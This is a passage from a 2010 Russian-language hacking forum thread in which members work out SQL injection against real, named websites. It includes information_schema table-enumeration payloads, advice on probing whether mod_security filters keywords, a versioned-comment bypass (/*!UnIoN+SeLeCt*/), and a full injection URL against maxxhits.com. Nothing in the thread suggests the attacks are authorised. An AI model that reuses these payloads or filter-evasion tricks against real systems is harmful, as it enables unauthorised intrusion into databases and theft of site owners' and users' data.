ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.08.2010, 01:20
|
|
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051
Репутация:
133
|
|
вот в режиме онлайн http://fiascowines.ca/images/gallery/scan.php?
|
|
|
11.08.2010, 01:38
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875
Репутация:
446
|
|
Фильтруется этот параметр? Чем можно заменить?
Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
|
|
|
|
11.08.2010, 01:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Electr0n
Фильтруется этот параметр? Чем можно заменить?
Код:
group_concat(table_name+separator+0x7c)+from+information_schema.tables+where+table_schema=
скажи что именно фильтруется
|
|
|
|
11.08.2010, 02:11
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875
Репутация:
446
|
|
Konqi, что именно не могу понять, как проверить?
|
|
|
|
11.08.2010, 02:12
|
|
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051
Репутация:
133
|
|
А что именно то у тебя фильтруется???мб доступа нету к схеме?
|
|
|
|
11.08.2010, 02:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Electr0n
Konqi
, что именно не могу понять, как проверить?
Потести разные словa,
union, select, group_concat, table_name, и т.п.
ошибка - не фильтрирует
forbidden - фильтрирует
если конечно это mod_security
|
|
|
|
11.08.2010, 02:26
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875
Репутация:
446
|
|
Konqi, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
|
|
|
|
11.08.2010, 02:33
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Electr0n
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
/showpost.php?p=2289579&postcount=14624
|
|
|
|
11.08.2010, 02:34
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Electr0n
Konqi
, Вот так пропускает /*!UnIoN+SeLeCt*/ ошибки нет...
Как остальные запросы фильтровать?
обход тем же способом что и union select
/threadnav46016-1343-10.html
|
|
|
|
11.08.2010, 02:51
|
|
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875
Репутация:
446
|
|
Посмотрите пожалуйста фильтр, попробовал не получилось вывести таблицы...
Код:
http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
